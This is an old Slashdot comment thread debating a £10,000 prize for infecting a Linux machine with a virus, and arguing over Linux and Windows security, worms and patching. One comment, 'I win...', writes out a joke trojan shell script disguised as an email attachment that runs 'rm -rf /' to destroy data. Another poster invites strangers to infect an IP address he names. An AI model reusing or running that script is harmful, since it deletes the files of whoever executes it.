£10,000 Prize for Linux Virus Challenge Re-Issued 296
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering
£10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
Virus challenge ... (Score:3, Interesting)
I guess crime does pay
Re:Virus challenge ... (Score:3, Insightful)
The point here isn't to encourage a plethora of Linux viruses, but to show how relatively safe Linux is compared to Micro-suck. Plus any security hole found, would no doubt be plugged much quicker than a Windows security flaw, which probably has to be reviewed by marketing and the legal department before a fix is forthcoming.
Re:Virus challenge ... (Score:2)
Oh, and I would just like to point out the fact that the following phrases are not, and never were, funny
Yes, they are. I, for one, find them quite amusing. More seriously, calling the enemy by the name he uses for himself merely legitimizes him. Thus, using those names for Micro$oft are a positive thing if you happen to be opposed to them. I tend to use $cientologist too.
Asking people to stop using them is a hallmark of an astroturfer, since that's one of the first things MS's crack team of P.R. psychologists would recommend.
Re:Virus challenge ... (Score:2)
Re:Virus challenge ... (Score:2)
It is of course different from calling Gates a doodoohead if I use the term "Micro$oft". It's still recognisably "Microsoft", but (a) the dollar sign emphasises that they're all about money. (b) in most parts of the world, also suggests corruption, since (b.1) it's associated with the USA, and (b.2) has connotations of "the serpent on the branch"
Microsoft uses dirty mind tricks straight out of Psychology 101 - be aware of them!
Re:Virus challenge ... (Score:3, Insightful)
Wow... I'm sure that will get modded as troll, but he has an interesting point. I question whether some gov agency won't step in and try to arrest anyone who manages to do it.
Remind you of the DVD-encrypt stuff? I know I am not stupid enough to try and prove to the world that I can wreak havok. Especially not now. That reward will go on unclaimed.
Re:Virus challenge ... (Score:2)
If the reward is claimed, we can probably expect that patches will be quickly written to defeat more malicious attacks in the future. And script kiddies will probably design similar programs, looking for systems that have yet to be patched...
It will turn into a bit of a race between the kernel development groups and the exploiters.
IIRC, a similar challenge was issued for a Mac based webserver (Webstar?)-- the "reward" was claimed by an individual who exploited a fairly insecure third party "classified ads" program. My guess is that third party software will form the basis of most candidate viruses.
The release, even if inadvertant, of viruses into the "wild" can lead to criminal prosecution. This may provide a safer avenue for certain types of computer security research, unlike the hacksmdi contest^H^H^H^H^H^H^Hsting operation...
correction: not webstar, but pcweek hack contest (Score:2)
Re:Virus challenge ... (Score:3, Insightful)
the 4th Amendment- it was nice while it lasted...
Re:Virus challenge ... (Score:2, Interesting)
If by use, you mean release, with the possibility of economic disruption by corruption of files, denial of service, etc. How is that not Criminal?
A focused attack on this one computer is probably not illegal, despite Ashcroff's pronouncements, because it is invited. If you write something, and never release it, that is probably not illegal, though of course if you write a virus, and it is discovered, and the legal system can prove (in the sense convince a jury) that there is reasonable intent to distribute, well that is problematic. Best not to write viruses in general.
For those who wish to pursue this contest, do so in an academic environment. Document your intent, your safe guards, and have your colleges review your safe guards.
Re:Virus challenge ... (Score:2)
Win the price (Score:3, Insightful)
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).
Re:Win the price (Score:2, Insightful)
If you're under-18 and live with gifted white parents.
a "security expert"
If you're in your mid 30s and wear a tie.
or a "terrorist"?
If you're an Arab, a Muslim, or are even Arab-looking.
Sad, but probably true.
This is Stupid (Score:4, Interesting)
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and its extremely hard to infect an NT system as well.
You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
Re:This is Stupid (Score:1, Insightful)
Re:This is Stupid (Score:2)
So how do you prevent that one?
Both platforms have numerours security issues, but I have noticed with a Windows platform the occurence of widespread eploitation before a patch is available occurs much more often than it does on any open source platform, simply because you don't have to wait for official acknowledgement of the problem before someone produces a fix.
Re:This is Stupid (Score:4, Informative)
http://aris.securityfocus.com/alerts/nimda/010921
Re:This is Stupid (Score:2)
Re:This is Stupid (Score:2)
Wholly intentional, I'm sure. MS want to push everyone to W2k and XP, where the vendor lock-in is much greater due to the authentication protocols used. Plus, no vendor, even a good one, wants to support more versions than they have to.
Re:This is Stupid (Score:3, Insightful)
The guy just holds a contest. You can do the same with a Windows box. It won't mean that you are comparing patched Windows with the default Linux installation. It will only mean that you are testing how stable patched Windows can be.
Too bad that a lot of slashdot moderators sympatize to M$ so much that they moderate up very weak arguments that just please them.
Re:This is Stupid (Score:2)
Maybe you ought to take out the 'symathize with M$' part -- M$, linux, gnome, kde, and nader supporters all do the same thing. perhaps we need a click-though license on the moderation guidelines before they can moderate
Re:This is Stupid (Score:2)
Re:This is Stupid (Score:2)
No it doesn't. Read the report again and notice the point where it says 'Enterprises infected by both Code Red and Nimda.'
Given that patches for these were available for quite a long time, in the case of Nimda around 18 months... They obviously were not talking about maintained systems.
RedHat next best thing to Microsoft (Score:3, Interesting)
RedHat has lost track of the whole idea of a destro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's rember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os develupers in mind.. not the avrage user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get ferther on the "RedHat".. RedHat is not Linux... RedHat is one single destro that compeates with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achived the title of "all time most buggy".
But those companys went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux destro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead destro.
So you can't just buy the first Linux destro on the shelfs any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finnaly as I understand Windows admin are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear dosen't seem to be shared by Linux counterparts.
Ideally a Linux destro should be fine out of the box needing no patching. Not all destros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basicly for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess thats not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
Troll, I say, Troll (Score:2)
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who things that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
So wrong, where do I start? (Score:3, Interesting)
"The defects found in RedHat and Windows are really stupid."
You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publically announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish them same like alloca.What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
- New library or suite that is noticeably better comes out
- RedHat recognizes that it is better, includes it in their distribution, tests, and releases
- People bitch and moan about how it breaks things that don't come with the distribution
- Everyone blames RedHat for doing a horrible job
- Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
- People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
- In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
- People deride the older version
- People forget it was RedHat that drove the newer, better library/suite into general use
- Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.Re:This is Stupid (Score:2, Informative)
I agree that systems must be patched. But, lets get real -- From my own experience, installing Microsoft patches is inherently unsafe. I must admit that it has been a while since I dealt with Microsoft Servers. However, I was involved in a hot-fix install where 39 out of 40 NT4.0 servers took patches just fine, but on that 40th, whoa!!! Corrupted registry, blue screen, total failure. Even after restoring from the backup, the patch caused the same failure. According to my client's MCSE, it turned out to be a hosed Microsoft Exchange setup that caused the problem. Perhaps it was my client's fault, but because of their service contract with another 3rd party responsible for Exchange, it took three full days of downtime to get Exchange reinstalled on a patched NT4.0 installation. My group got reamed for the email downtime when all we did was apply security fixes.
The point I'm trying to make is this: How many admins out there have been burned by applying MS hot-fixes and wait until a full service pack before doing anything, if even then?
it's his Linux box, not any Linux box (Score:2)
Most likely he considers the oppertunity to study these attempts in a controlled enviroment, more valuable than the money anyways. In a world where most warrenties say something like "Not guarenteed to be suitable for any purpose". I find this approach most refreshing. Try and find commercialy producted software that states that its suitable even for the purpose it was manufactured for.
I hope for his sake running outlook and IE 5.5 in wine is out-of-bonds. I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability.
Re:it's his Linux box, not any Linux box (Score:2)
yes it was considered to be a milestone to be able to run a macro virus. even though it would not propagate through to other documents.
Irresponisble (Score:2, Interesting)
Let the virus kiddies stick to targeting Windoze.
HH
Re:Irresponisble (Score:1)
Responsible (Score:3, Redundant)
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicous virus, and the damage will be far greater in that case. Think man.
Does it have to be a virus? (Score:5, Funny)
Two years and Nothing?? (Score:1, Interesting)
But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
Re:Two years and Nothing?? (Score:1)
Re:Two years and Nothing?? (Score:2)
Re:Two years and Nothing?? (Score:2)
If businesses want to make their networks secure (Score:4, Insightful)
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
Re:If businesses want to make their networks secur (Score:2)
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? that's rediculous.
Re:If businesses want to make their networks secur (Score:1)
I didn't know hackers wire viruses (Score:1)
Big deal (Score:1)
As for Tardy Sysadmins... (Score:1)
The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.
Problem, is the university doesn't seem to be willing to do anything about it.
Re:As for Tardy Sysadmins... (Score:2)
Name that University. Identify their netblock(s). I'm sure someone will do something about it.
Mac virus (Score:2, Funny)
So start coding... There is a lot of competition out there...
It's a prize for the lawyers (Score:1)
So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
MS is in a tough spot (Score:2)
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
Uhh, I can see someone winning. (Score:1)
Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
Windows Update? (Score:5, Insightful)
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
Re:Windows Update? (Score:2)
Then I thought "how are all these admins going to patch their servers against the new virus if Windows Update is infected?"
of course no one will win the contest... (Score:2, Insightful)
Re:of course no one will win the contest... (Score:2)
However, technically bright people who prefer MS Windows over open source systems may well have an interest in proving Linux is not invulnerable to this kind of thing. If one of them can get in, that might well prove something. If both of them can, it probably does prove something.
Re:of course no one will win the contest... (Score:2)
It depends on your definition of "best". The best OS to make Bill rich --> Windows. The best OS to give the CEO that warm comfy feeling that there will be money in the pot to collect when they have to sue someone for everything going wrong --> Windows. The best OS for those that really don't care what the system does, as long as everyone thinks it does exactly everything they need to do today, tomorrow, and forever --> Windows. The OS that sells the most, no matter what the reason is --> Windows.
So why do you choose Windows?
Re:of course no one will win the contest... (Score:2)
Secondly, kernel exploits are rare. A real virus would probably use an exploit in glibc or in an application.
Windows is secure .... (Score:1, Interesting)
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.
And please no DOS attacks....
Re:Windows is secure .... (Score:2, Funny)
Increase Revard. (Score:1)
Thats impossible man, They can't write worm or virus.
Maybe for apache or someting.
But in any condition. its impossible to spread like M$ worms.
Slight aside.... (Score:2, Funny)
--just a thought. No intent to offend, etc.
Short Answer: Anthrax isn't a virus.
More details? (Score:1)
Re:More details? (Score:2)
Re:More details? (Score:2)
Re:More details? (Score:2)
Wouldn't that be the whole point of this challenge? -- that Linux has a better 'design', and therefore is supposedly immune to viruses.
We all know that the most suceptable system to viruses is DOS/Windows, and that's certainly by design (although there's loads of implementation issues too).
Re:More details? (Score:2)
What it means... (Score:2)
Now huge sucess in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
Terrorism & Viri (Score:2)
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
Re:Terrorism & Viri (Score:2)
More to the point, I wish CmdrTaco didn't. Then, perhaps, he'd use the correct £ HTML character entity, rather than a Latin1 pound (0xA3). Try setting the character encoding to something else (e.g., Cyrillic ISO-8859-5) and then look at the title of this story to see why.
Contests like this are stupid (Score:2)
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But lets say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to annoucement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
Re:Contests like this are stupid (Score:2)
Now, hacking a Linux distribution (Linux + userland) is a completely different challenge.
Proves Nothing (Score:2, Insightful)
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
Re:Proves Nothing (Score:2)
Don't blame stupid people for viruses; the average person won't and shouldn't have to know enough to block every virus. Blame the people who made systems where virus writing is simple and fruitful.
Hope people have read the Gartner report... (Score:5, Informative)
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
Re:Hope people have read the Gartner report... (Score:2)
You don't have to spend all of your time doing anything to IIS. You monitor a handful of email lists, and apply patches as they come out once a month or so. Takes maybe a few hours of time a month.
But, if you read the Gartner report what they specifically say is that enterprises which were impacted by both Code Red and Nimda should look at alternatives.
The rational behind this being that if that was the case, then you obviously don't have the procedures in place to keep up to date on your servers.
The Gartner report was a kneejerk reaction which wasn't really helpful... like most Gartner recommendations.
Makes me wonder... (Score:3, Insightful)
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
Gimme my money! (Score:2)
Microsoft exec .. (Score:2)
Yeah.. they were to lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Note to Middle East (Score:2)
I win... (Score:2)
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blantently clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
Re:I win... (Score:2)
1) save it as a file
2) enable execute permission (chmod +x file)
3) run.
So there is no way you can run it inadvertantly (as is the case with Outlook).
tardy?!?!?! (Score:2)
Tardy admins (Score:2, Insightful)
Re:'tardy' sysadmins (Score:3, Interesting)
I do find myself somewhat agreeing with Microsoft on this. Bugs happen. Open source may have fewer of them, but they happen with open source, too. Very few open source systems are secure "out of the box". Any admin that assumes otherwise, for BSD, or Linux, or Microsoft Windows, is a retard. Comparing an improperly administered system of one class to a tightly secured system of another is really pointless. It's comparing a retard to someone who knows what they are doing, and cares.
Re:'tardy' sysadmins (Score:1, Informative)
I think it was on the freebsd website that I recently saw something along the lines of "four years without a remote exploit in the default install". Can either Microsoft or the Linux community claim that? Of course not. But the point is, it IS POSSIBLE, you can't just blame sysadmins, the vendor needs to accept some responsibility too. It shows that if a vendor really feels strongly about security, then it is possible.
On a side note, I struggle to believe that MS isn't legally responsible for damage resulting from defects in its products, or that if they aren't (via EULAs) that people accept this blithely, MS has had a pretty lax attitude up to now.
Re:'tardy' sysadmins (Score:2)
Re:'tardy' sysadmins (Score:2)
you can amaze a lot of windows only people by knowing how to run common stuff from the command line.
Have you ever worked as a real sysadmin? (Score:5, Insightful)
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
Re:Have you ever worked as a real sysadmin? (Score:3, Insightful)
I've seen a whole lot of sloppy code coming out of Unix centrix projects (gives me shivers at night). But I think that the problem that MS has is less with sloppy code (I think their code really isn't any more sloppy than the rest of the world), but their OS design around one user instead of multiple users. MS has a much better file level security model then most unix platforms (throw ACL's and you've got a contender), but everything & everybody pretty much has to have hooks as an admin user. It's really the equivalent of having Grandma sitting in front of a Linux system as a root user; if Microsoft could take the single user admin privilege (for both the user and the apps) away then the issue would really start to go away.
Re:Have you ever worked as a real sysadmin? (Score:2)
Please don't use Redhat as an example of Linux's security potentials. In a sense, Redhat is the "MS Windows" of Linux distributions. It's designed for the masses, and to be "one shoe fits all", which is one of the many factors making Windows itself so problematic. Try porting everything but the kernel from OpenBSD to a Linux environment (including the libraries, which could be a bit of work). Assuming that OpenBSD is all that Theo claims it to be in terms of security, and that Linux (it's just a kernel, remember) is all that Linus claims it is, this should be quite a solid Linux system. There are, of course, other ways to accomplish this. Take a look at some of the secure Linux distributions such as perhaps Engarde Linux.
Re:Have you ever worked as a real sysadmin? (Score:2)
Here's the point that you missed, Linux's (even with all this sloppy code) core design philosophy is to run apps as a non-privileged user; so even though user Joe makes a sloppy coded web app that has security holes out the wazoo, it still doesn't allow the attacker to gain root access to the box, since it's normally ran as user nobody, httpd, etc. sloppy code gets stopped at that level. Where MS also has sloppy code (you seemed to miss that, I never said they didn't have sloppy code but that their design was more the problem), but their everything needs privileged access design
Examples... well how about the 9/20 Windomaker buffer overflow, I'd consider that well usef, that's pretty sloppy not doing bounds checking.
Let's face it, sloppy code isn't going to go away on any OS or any platform. You can strive to make sure it gets cleaned up, but it never is going to go away. MS may have more or less sloppy code than is in Linux distros but their design philosophy makes them much more vulnerable since pretty much everything has to run with admin privileges somewhere. Where Unix could have the sloppiest code around and not have root level compromises since it harldy ever really needs root access for it's apps. Which is the point I was making and you completely missed.
Re:Have you ever worked as a real sysadmin? (Score:2)
You really don't think it's a fiasco when the stated stable kernel revs are doing development (odd or 2.5) kind of work and actually *breaking* things. Linus/Linux doesn't owe me shit, but it *IS* a fiasco when it's stable release does stupid shit like it's doing (completely replacing the VM subsystem for one) that should actually belong in the 2.5 release. (again that was a completely, tiny, itty bitty bit of my original post, that for some reason you've made into some huge issue).
Now what the heck, do you not realize that I gave you the *specific* example of a program that had a buffer overflow last month in WindowManager that you need more. Ok fine, since you are too lazy to go up and look at the example I told you, on securityfocus. I should have known better than to respond intelligently to a person who thinks that Unix code has absolutely no sloppy code in it anywhere.
http://www.securityfocus.org/cgi-bin/vulns-item
-----
bugtraq id 3177
object wmaker
class Boundary Condition Error
cve CVE-MAP-NOMATCH
remote Yes
local No
published Aug 12, 2001
updated Sep 20, 2001
vulnerable
Windowmaker Windowaker 0.60
- Conectiva Linux 4.0
Windowmaker Windowaker 0.61
- Conectiva Linux 4.2
- Conectiva Linux 5.0
- Debian Linux 2.2
- MandrakeSoft Corporate Server 1.0.1
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.2
Windowmaker Windowaker 0.61.1
Windowmaker Windowaker 0.62
- Conectiva Linux 5.1
- Conectiva Linux 6.0
Windowmaker Windowaker 0.62.1
Windowmaker Windowaker 0.63
Windowmaker Windowaker 0.63.1
Windowmaker Windowaker 0.64
- MandrakeSoft Linux Mandrake 8.0
not vulnerable
Windowmaker Windowaker 0.65
WindowMaker is a window manager for X11 systems. It is often run on end-user systems.
WindowMaker contains a buffer overflow that may be exploitable by remote attackers. The
overflow condition is present when X11 applications are setting the titles of their windows.
This vulnerability can be exploited by X11 applications which can connect to the Xserver. Any arbitrary code that is executed will run with the privileges of the window manager. It will also execute on the system where it is running.
-----
If you are so dense that you don't realize that not doing bounds checking is the equivalent of sloppy code then here, ReiserFS earlier this year introduced a kernel level security bug (since ReiserFS hooks are now allowed into the kernel with 2.4.1) because of a buffer overflow. I put up, now you shut up.
--- linux/include/linux/reiserfs_fs.h.1 Tue Jan 9 21:22:27 2001
+++ linux/include/linux/reiserfs_fs.h Tue Jan 9 21:22:55 2001
@@ -926,8 +926,7 @@
-#define REISERFS_MAX_NAME_LEN(block_size) \
-((block_size - BLKH_SIZE - IH_SIZE - DEH_SIZE))
+#define REISERFS_MAX_NAME_LEN(block_size) 255
--- linux/fs/reiserfs/dir.c.1 Tue Jan 9 21:22:19 2001
+++ linux/fs/reiserfs/dir.c Tue Jan 9 21:21:02 2001
@@ -142,6 +142,10 @@
if (!d_name[d_reclen - 1])
d_reclen = strlen (d_name);
+ if (d_reclen > REISERFS_MAX_NAME_LEN(inode->i_sb->s_blocksi ze)){
+
+ continue ;
+ }
d_off = deh_offset (deh);
filp->f_pos = d_off ;
d_ino = deh_objectid (deh);
Re:Have you ever worked as a real sysadmin? (Score:5, Informative)
When I worked at a certain Very Large Airplane Company, we had a very simple procedure for emergency upgrades:
- Patch the backup server (you do have a backup server, don't you?)
- Fail over to the backup server (you do have a failover procedure, don't you?)
- Patch the main production server
- Fail back to main
Sometimes several days would elapse between the patch/failover/patch and the fail back.... because we had capacity planned the failover host to be able to run the production floor at full speed, and there was no use slamming things around without necessity. Besides, it was a good test for the failover machine to run for a day or three as production just to see....Yes, most system incursions are preventable with good patching and good firewalling. Yes, this applies across ALL OSen. Yes, Microsoft code is crappy and the number of security updates is thru the roof, but that's not the point of this argument.
The point is that if you can't get an outage to apply a critical patch whose absence may cost you a full reinstall and a weeks' downtime, you have a management problem and a design problem, not a vendor problem or a sysadm problem..... and you need to be thinking (a) what's the best way to fix this, and if that doesn't give you any good answers (b) where do I want to work next. Because sooner or later somebody's going to 0wN j00, and if your ass isn't grass you'll wish it were.
Re:Have you ever worked as a real sysadmin? (Score:2)
But at least you can usually just patch the relevent application, rather than the whole thing.
Now I don't deal with MS stuff so I can't comment authoritively, but it seems that the number of patches with MS products is never ending.
Also when you install the patch, it's reboot! time.
This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
It's probably more a case of the basic design.
Not sloppy coding (Score:2)
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compomise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
Re:10,000? (Score:1)
Re:10,000? (Score:2)
1 pound == 1.45$
Protecting MS? (Score:2)
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowing changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
Re:reminds me .... (Score:2)
Surely they were doing more than just pinging the box to try to get the contents of a file.
Re:something weird on netcraft (Score:2, Insightful)
Webservers that operate behind a load balancer, reverse proxy server or a firewall will often report the operating system of the load balancer, reverse proxy or firewall server. Hence reports of 'Microsoft/IIS on Linux' indicate that either the web server is behind a Linux server that is acting as a reverse proxy, has been configured to send a different signature or Microsoft have released a version of IIS for Linux.
And If you look at the history info for download.microsoft.com it shows that it is an akamai site. As well all know akamai runs linux.
Security vulnerabilities (Score:2)
not have the virus-spreading email programs and other software that
populates the Windows enviroment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how abaout a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would ba allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
Re:Security vulnerabilities (Score:2)
And if the service is not installed, then that port is as good as blocked anyway.
Easy money perhaps... (Score:2)